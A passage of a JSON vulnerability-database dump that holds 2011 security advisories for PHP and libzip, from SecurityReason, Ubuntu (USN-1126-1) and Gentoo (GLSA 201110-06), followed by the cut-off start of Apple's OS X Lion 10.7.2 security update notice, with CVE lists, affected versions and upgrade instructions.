/build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316\r\n\r\n\r\n--- 3. Fix ---\r\nThis issue has been fixed with PHP Team, so big thanks guys.\r\n\r\nhttp://www.php.net/ChangeLog-5.php#5.3.6\r\n\r\nhttp://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_name_locate.c?annotate=307867\r\n\r\n\r\n--- 4. Greets ---\r\nSpecial thanks for Pierre Joye and Stas\r\n\r\nsp3x, Infospec,\r\n\r\n\r\n--- 5. Contact ---\r\nAuthor: Maksymilian Arciemowicz\r\n\r\nEmail:\r\n- cxib {a\./t] securityreason [d=t} com\r\n\r\nGPG:\r\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://cxib.net/", "edition": 1, "modified": "2011-03-21T00:00:00", "published": "2011-03-21T00:00:00", "id": "SECURITYVULNS:DOC:25952", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25952", "title": "libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "cvelist": ["CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-0441", "CVE-2011-1471", "CVE-2011-1148", "CVE-2011-1466", "CVE-2010-4697", "CVE-2011-1092", "CVE-2011-1144", "CVE-2010-4698", "CVE-2006-7243", "CVE-2011-0708", "CVE-2011-1468", "CVE-2011-0420", "CVE-2011-1470", "CVE-2011-1469", "CVE-2011-1464", "CVE-2011-1072"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1126-1\r\nApril 29, 2011\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 9.10\r\n- Ubuntu 8.04 LTS\r\n- Ubuntu 6.06 LTS\r\n\r\nSummary:\r\n\r\nMultiple vulnerabilities in PHP.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nStephane Chazelas discovered that the /etc/cron.d/php5 cron job for\r\nPHP 5.3.5 allows local users to delete arbitrary files via a symlink\r\nattack on a directory under /var/lib/php5/. (CVE-2011-0441)\r\n\r\nRaphael Geisert and Dan Rosenberg discovered that the PEAR installer\r\nallows local users to overwrite arbitrary files via a symlink attack on\r\nthe package.xml file, related to the (1) download_dir, (2) cache_dir,\r\n(3) tmp_dir, and (4) pear-build-download directories. (CVE-2011-1072,\r\nCVE-2011-1144)\r\n\r\nBen Schmidt discovered that a use-after-free vulnerability in the PHP\r\nZend engine could allow an attacker to cause a denial of service (heap\r\nmemory corruption) or possibly execute arbitrary code. (CVE-2010-4697)\r\n\r\nMartin Barbella discovered a buffer overflow in the PHP GD extension\r\nthat allows an attacker to cause a denial of service (application crash)\r\nvia a large number of anti- aliasing steps in an argument to the\r\nimagepstext function. (CVE-2010-4698)\r\n\r\nIt was discovered that PHP accepts the \0 character in a pathname,\r\nwhich might allow an attacker to bypass intended access restrictions\r\nby placing a safe file extension after this character. This issue\r\nis addressed in Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04.\r\n(CVE-2006-7243)\r\n\r\nMaksymilian Arciemowicz discovered that the grapheme_extract function\r\nin the PHP Internationalization extension (Intl) for ICU allow\r\nan attacker to cause a denial of service (crash) via an invalid\r\nsize argument, which triggers a NULL pointer dereference. This\r\nissue affected Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu\r\n11.04. (CVE-2011-0420)\r\n\r\nMaksymilian Arciemowicz discovered that the _zip_name_locate\r\nfunction in the PHP Zip extension does not properly handle a\r\nZIPARCHIVE::FL_UNCHANGED argument, which might allow an attacker to\r\ncause a denial of service (NULL pointer dereference) via an empty\r\nZIP archive. This issue affected Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu\r\n10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04. (CVE-2011-0421)\r\n\r\nLuca Carettoni discovered that the PHP Exif extension performs an\r\nincorrect cast on 64bit platforms, which allows a remote attacker\r\nto cause a denial of service (application crash) via an image with\r\na crafted Image File Directory (IFD). (CVE-2011-0708)\r\n\r\nJose Carlos Norte discovered that an integer overflow in the PHP\r\nshmop extension could allow an attacker to cause a denial of service\r\n(crash) and possibly read sensitive memory function. (CVE-2011-1092)\r\n\r\nFelipe Pena discovered that a use-after-free vulnerability in the\r\nsubstr_replace function allows an attacker to cause a denial of\r\nservice (memory corruption) or possibly execute arbitrary code.\r\n(CVE-2011-1148)\r\n\r\nFelipe Pena discovered multiple format string vulnerabilities in the\r\nPHP phar extension. These could allow an attacker to obtain sensitive\r\ninformation from process memory, cause a denial of service (memory\r\ncorruption), or possibly execute arbitrary code. This issue affected\r\nUbuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04.(CVE-2011-1153)\r\n\r\nIt was discovered that a buffer overflow occurs in the strval function\r\nwhen the precision configuration option has a large value. The default\r\ncompiler options for Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS,\r\nUbuntu 10.10, and Ubuntu 11.04 should reduce the vulnerability to a\r\ndenial of service. (CVE-2011-1464)\r\n\r\nIt was discovered that an integer overflow in the SdnToJulian function\r\nin the PHP Calendar extension could allow an attacker to cause a\r\ndenial of service (application crash). (CVE-2011-1466)\r\n\r\nTomas Hoger discovered that an integer overflow in the\r\nNumberFormatter::setSymbol function in the PHP Intl extension\r\ncould allow an attacker to cause a denial of service (application\r\ncrash). This issue affected Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu\r\n11.04. (CVE-2011-1467)\r\n\r\nIt was discovered that multiple memory leaks in the PHP OpenSSL\r\nextension might allow a remote attacker to cause a denial of service\r\n(memory consumption). This issue affected Ubuntu 10.04 LTS, Ubuntu\r\n10.10, and Ubuntu 11.04. (CVE-2011-1468)\r\n\r\nDaniel Buschke discovered that the PHP Streams component in PHP\r\nhandled types improperly, possibly allowing an attacker to cause a\r\ndenial of service (application crash). (CVE-2011-1469)\r\n\r\nIt was discovered that the PHP Zip extension could allow an attacker to\r\ncause a denial of service (application crash) via a ziparchive stream\r\nthat is not properly handled by the stream_get_contents function. This\r\nissue affected Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, Ubuntu\r\n10.10, and Ubuntu 11.04. (CVE-2011-1470)\r\n\r\nIt was discovered that an integer signedness error in the PHP Zip\r\nextension could allow an attacker to cause a denial of service (CPU\r\nconsumption) via a malformed archive file. This issue affected\r\nUbuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, Ubuntu 10.10, and\r\nUbuntu 11.04. (CVE-2011-1470) (CVE-2011-1471)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.04:\r\n libapache2-mod-php5 5.3.5-1ubuntu7.1\r\n php-pear 5.3.5-1ubuntu7.1\r\n php5 5.3.5-1ubuntu7.1\r\n php5-cgi 5.3.5-1ubuntu7.1\r\n php5-cli 5.3.5-1ubuntu7.1\r\n php5-common 5.3.5-1ubuntu7.1\r\n php5-curl 5.3.5-1ubuntu7.1\r\n php5-dev 5.3.5-1ubuntu7.1\r\n php5-gd 5.3.5-1ubuntu7.1\r\n php5-intl 5.3.5-1ubuntu7.1\r\n\r\nUbuntu 10.10:\r\n libapache2-mod-php5 5.3.3-1ubuntu9.4\r\n php-pear 5.3.3-1ubuntu9.4\r\n php5 5.3.3-1ubuntu9.4\r\n php5-cgi 5.3.3-1ubuntu9.4\r\n php5-cli 5.3.3-1ubuntu9.4\r\n php5-common 5.3.3-1ubuntu9.4\r\n php5-curl 5.3.3-1ubuntu9.4\r\n php5-dev 5.3.3-1ubuntu9.4\r\n php5-gd 5.3.3-1ubuntu9.4\r\n php5-intl 5.3.3-1ubuntu9.4\r\n\r\nUbuntu 10.04 LTS:\r\n libapache2-mod-php5 5.3.2-1ubuntu4.8\r\n php-pear 5.3.2-1ubuntu4.8\r\n php5 5.3.2-1ubuntu4.8\r\n php5-cgi 5.3.2-1ubuntu4.8\r\n php5-cli 5.3.2-1ubuntu4.8\r\n php5-common 5.3.2-1ubuntu4.8\r\n php5-curl 5.3.2-1ubuntu4.8\r\n php5-dev 5.3.2-1ubuntu4.8\r\n php5-gd 5.3.2-1ubuntu4.8\r\n php5-intl 5.3.2-1ubuntu4.8\r\n\r\nUbuntu 9.10:\r\n libapache2-mod-php5 5.2.10.dfsg.1-2ubuntu6.9\r\n php-pear 5.2.10.dfsg.1-2ubuntu6.9\r\n php5 5.2.10.dfsg.1-2ubuntu6.9\r\n php5-cgi 5.2.10.dfsg.1-2ubuntu6.9\r\n php5-cli 5.2.10.dfsg.1-2ubuntu6.9\r\n php5-common 5.2.10.dfsg.1-2ubuntu6.9\r\n php5-curl 5.2.10.dfsg.1-2ubuntu6.9\r\n php5-dev 5.2.10.dfsg.1-2ubuntu6.9\r\n php5-gd 5.2.10.dfsg.1-2ubuntu6.9\r\n\r\nUbuntu 8.04 LTS:\r\n libapache2-mod-php5 5.2.4-2ubuntu5.15\r\n php-pear 5.2.4-2ubuntu5.15\r\n php5 5.2.4-2ubuntu5.15\r\n php5-cgi 5.2.4-2ubuntu5.15\r\n php5-cli 5.2.4-2ubuntu5.15\r\n php5-common 5.2.4-2ubuntu5.15\r\n php5-curl 5.2.4-2ubuntu5.15\r\n php5-dev 5.2.4-2ubuntu5.15\r\n php5-gd 5.2.4-2ubuntu5.15\r\n\r\nUbuntu 6.06 LTS:\r\n libapache2-mod-php5 5.1.2-1ubuntu3.22\r\n php-pear 5.1.2-1ubuntu3.22\r\n php5 5.1.2-1ubuntu3.22\r\n php5-cgi 5.1.2-1ubuntu3.22\r\n php5-cli 5.1.2-1ubuntu3.22\r\n php5-common 5.1.2-1ubuntu3.22\r\n php5-curl 5.1.2-1ubuntu3.22\r\n php5-dev 5.1.2-1ubuntu3.22\r\n php5-gd 5.1.2-1ubuntu3.22\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n CVE-2006-7243, CVE-2010-4697, CVE-2010-4698, CVE-2011-0420,\r\n CVE-2011-0421, CVE-2011-0441, CVE-2011-0708, CVE-2011-1072,\r\n CVE-2011-1092, CVE-2011-1144, CVE-2011-1148, CVE-2011-1153,\r\n CVE-2011-1464, CVE-2011-1466, CVE-2011-1467, CVE-2011-1468,\r\n CVE-2011-1469, CVE-2011-1470, CVE-2011-1471\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.3.5-1ubuntu7.1\r\n https://launchpad.net/ubuntu/+source/php5/5.3.3-1ubuntu9.4\r\n https://launchpad.net/ubuntu/+source/php5/5.3.2-1ubuntu4.8\r\n https://launchpad.net/ubuntu/+source/php5/5.2.10.dfsg.1-2ubuntu6.9\r\n https://launchpad.net/ubuntu/+source/php5/5.2.4-2ubuntu5.15\r\n https://launchpad.net/ubuntu/+source/php5/5.1.2-1ubuntu3.22\r\n", "edition": 1, "modified": "2011-05-01T00:00:00", "published": "2011-05-01T00:00:00", "id": "SECURITYVULNS:DOC:26262", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26262", "title": "[USN-1126-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-0441", "CVE-2011-1471", "CVE-2011-1148", "CVE-2011-1466", "CVE-2010-4697", "CVE-2011-1092", "CVE-2011-1144", "CVE-2010-4698", "CVE-2006-7243", "CVE-2011-0708", "CVE-2011-1468", "CVE-2011-0420", "CVE-2011-1470", "CVE-2011-1469", "CVE-2011-1464", "CVE-2011-1072"], "description": "Privilege escalation, memory corruptions, buffer overflows, DoS conditions, integer overflows, format string vulnerabilities, information leaks.", "edition": 1, "modified": "2011-05-01T00:00:00", "published": "2011-05-01T00:00:00", "id": "SECURITYVULNS:VULN:11634", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11634", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", "CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 201110-06\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: High\r\n Title: PHP: Multiple vulnerabilities\r\n Date: October 10, 2011\r\n Bugs: #306939, #332039, #340807, #350908, #355399, #358791,\r\n #358975, #369071, #372745, #373965, #380261\r\n ID: 201110-06\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nMultiple vulnerabilities were found in PHP, the worst of which leading\r\nto remote execution of arbitrary code.\r\n\r\nBackground\r\n==========\r\n\r\nPHP is a widely-used general-purpose scripting language that is\r\nespecially suited for Web development and can be embedded into HTML.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 dev-lang/php < 5.3.8 >= 5.3.8\r\n\r\nDescription\r\n===========\r\n\r\nMultiple vulnerabilities have been discovered in PHP. Please review the\r\nCVE identifiers referenced below for details.\r\n\r\nImpact\r\n======\r\n\r\nA context-dependent attacker could execute arbitrary code, obtain\r\nsensitive information from process memory, bypass intended access\r\nrestrictions, or cause a Denial of Service in various ways.\r\n\r\nA remote attacker could cause a Denial of Service in various ways,\r\nbypass spam detections, or bypass open_basedir restrictions.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll PHP users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.8"\r\n\r\nReferences\r\n==========\r\n\r\n[ 1 ] CVE-2006-7243\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-7243\r\n[ 2 ] CVE-2009-5016\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5016\r\n[ 3 ] CVE-2010-1128\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1128\r\n[ 4 ] CVE-2010-1129\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1129\r\n[ 5 ] CVE-2010-1130\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1130\r\n[ 6 ] CVE-2010-1860\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1860\r\n[ 7 ] CVE-2010-1861\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1861\r\n[ 8 ] CVE-2010-1862\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1862\r\n[ 9 ] CVE-2010-1864\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1864\r\n[ 10 ] CVE-2010-1866\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1866\r\n[ 11 ] CVE-2010-1868\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1868\r\n[ 12 ] CVE-2010-1914\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1914\r\n[ 13 ] CVE-2010-1915\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1915\r\n[ 14 ] CVE-2010-1917\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1917\r\n[ 15 ] CVE-2010-2093\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2093\r\n[ 16 ] CVE-2010-2094\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2094\r\n[ 17 ] CVE-2010-2097\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2097\r\n[ 18 ] CVE-2010-2100\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2100\r\n[ 19 ] CVE-2010-2101\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2101\r\n[ 20 ] CVE-2010-2190\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2190\r\n[ 21 ] CVE-2010-2191\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2191\r\n[ 22 ] CVE-2010-2225\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2225\r\n[ 23 ] CVE-2010-2484\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2484\r\n[ 24 ] CVE-2010-2531\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2531\r\n[ 25 ] CVE-2010-2950\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2950\r\n[ 26 ] CVE-2010-3062\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3062\r\n[ 27 ] CVE-2010-3063\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3063\r\n[ 28 ] CVE-2010-3064\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3064\r\n[ 29 ] CVE-2010-3065\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3065\r\n[ 30 ] CVE-2010-3436\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3436\r\n[ 31 ] CVE-2010-3709\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3709\r\n[ 32 ] CVE-2010-3709\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3709\r\n[ 33 ] CVE-2010-3710\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3710\r\n[ 34 ] CVE-2010-3710\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3710\r\n[ 35 ] CVE-2010-3870\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3870\r\n[ 36 ] CVE-2010-4150\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4150\r\n[ 37 ] CVE-2010-4409\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4409\r\n[ 38 ] CVE-2010-4645\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4645\r\n[ 39 ] CVE-2010-4697\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4697\r\n[ 40 ] CVE-2010-4698\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4698\r\n[ 41 ] CVE-2010-4699\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4699\r\n[ 42 ] CVE-2010-4700\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4700\r\n[ 43 ] CVE-2011-0420\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0420\r\n[ 44 ] CVE-2011-0421\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0421\r\n[ 45 ] CVE-2011-0708\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0708\r\n[ 46 ] CVE-2011-0752\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0752\r\n[ 47 ] CVE-2011-0753\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0753\r\n[ 48 ] CVE-2011-0755\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0755\r\n[ 49 ] CVE-2011-1092\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1092\r\n[ 50 ] CVE-2011-1148\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1148\r\n[ 51 ] CVE-2011-1153\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1153\r\n[ 52 ] CVE-2011-1464\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1464\r\n[ 53 ] CVE-2011-1466\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1466\r\n[ 54 ] CVE-2011-1467\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1467\r\n[ 55 ] CVE-2011-1468\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1468\r\n[ 56 ] CVE-2011-1469\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1469\r\n[ 57 ] CVE-2011-1470\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1470\r\n[ 58 ] CVE-2011-1471\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1471\r\n[ 59 ] CVE-2011-1657\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1657\r\n[ 60 ] CVE-2011-1938\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1938\r\n[ 61 ] CVE-2011-2202\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2202\r\n[ 62 ] CVE-2011-2483\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2483\r\n[ 63 ] CVE-2011-3182\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3182\r\n[ 64 ] CVE-2011-3189\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3189\r\n[ 65 ] CVE-2011-3267\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3267\r\n[ 66 ] CVE-2011-3268\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3268\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-201110-06.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users' machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttps://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2011 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5\r\n", "edition": 1, "modified": "2011-10-12T00:00:00", "published": "2011-10-12T00:00:00", "id": "SECURITYVULNS:DOC:27147", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27147", "title": "[ GLSA 201110-06 ] PHP: Multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-0187", "CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-3221", "CVE-2011-3227", "CVE-2011-0259", "CVE-2011-3216", "CVE-2011-3246", "CVE-2011-1466", "CVE-2011-3435", "CVE-2011-3222", "CVE-2011-0229", "CVE-2011-1521", "CVE-2010-4172", "CVE-2011-0419", "CVE-2011-1092", "CVE-2011-0252", "CVE-2011-3223", "CVE-2011-0185", "CVE-2011-1755", "CVE-2011-3220", "CVE-2011-0224", "CVE-2011-2464", "CVE-2010-4645", "CVE-2011-3214", "CVE-2010-3436", "CVE-2010-1157", "CVE-2011-0013", "CVE-2011-0708", "CVE-2011-3228", "CVE-2011-0249", "CVE-2011-0231", "CVE-2011-0534", "CVE-2011-3437", "CVE-2011-2691", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-2089", "CVE-2011-3224", "CVE-2011-0226", "CVE-2011-1470", "CVE-2011-3192", "CVE-2011-3219", "CVE-2011-3436", "CVE-2011-3225", "CVE-2011-3215", "CVE-2011-0260", "CVE-2011-2692", "CVE-2010-2227", "CVE-2011-1469", "CVE-2011-3218", "CVE-2010-3614", "CVE-2011-3213", "CVE-2010-3718", "CVE-2011-0250", "CVE-2011-3217", "CVE-2010-3613", "CVE-2010-1634", "CVE-2010-0097", "CVE-2011-0251", "CVE-2011-0707", "CVE-2011-0230", "CVE-2011-3226", "CVE-2011-2690", "CVE-2011-0411", "CVE-2011-3212", "CVE-2009-4022", "CVE-2011-1910"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-10-12-3 OS X Lion v10.7.2 and Security Update 2011-006\r\n\r\nOS X Lion v10.7.2 and Security Update 2011-006 is now available and\r\naddresses the following:\r\n\r\nApache\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in Apache\r\nDescription: Apache is updated to version 2.2.20 to address several\r\nvulnerabilities, the most serious of which may lead to a denial of\r\nservice. CVE-2011-0419 does not affect OS X Lion systems. Further\r\ninformation is available via the Apache web site at\r\nhttp://httpd.apache.org/\r\nCVE-ID\r\nCVE-2011-0419\r\nCVE-2011-3192\r\n\r\nApplication Firewall\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Executing a binary with a maliciously crafted name may lead\r\nto arbitrary code execution with elevated privileges\r\nDescription: A format string vulnerability existed in Application\r\nFirewall's debug logging.\r\nCVE-ID\r\nCVE-2011-0185 : an anonymous reporter\r\n\r\nATS\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing or downloading a document containing a maliciously\r\ncrafted embedded font may lead to arbitrary code execution\r\nDescription: A signedness issue existed in ATS' handling of Type 1\r\nfonts. This issue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3437\r\n\r\nATS\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing or downloading a document containing a maliciously\r\ncrafted embedded font may lead to arbitrary code execution\r\nDescription: An out of bounds memory access issue existed in ATS'\r\nhandling of Type 1 fonts. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0229 : Will Dormann of the CERT/CC\r\n\r\nATS\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Applications which use the ATSFontDeactivate API may be\r\nvulnerable to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: A buffer overflow issue existed in the\r\nATSFontDeactivate API.\r\nCVE-ID\r\nCVE-2011-0230 : Steven Michaud of Mozilla\r\n\r\nBIND\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in BIND 9.7.3\r\nDescription: Multiple denial of service issues existed in BIND\r\n9.7.3. These issues are addressed by updating BIND to version\r\n9.7.3-P3.\r\nCVE-ID\r\nCVE-2011-1910\r\nCVE-2011-2464\r\n\r\nBIND\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in BIND\r\nDescription: Multiple denial of service issues existed in BIND.\r\nThese issues are addressed by updating BIND to version 9.6-ESV-R4-P3.\r\nCVE-ID\r\nCVE-2009-4022\r\nCVE-2010-0097\r\nCVE-2010-3613\r\nCVE-2010-3614\r\nCVE-2011-1910\r\nCVE-2011-2464\r\n\r\nCertificate Trust Policy\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 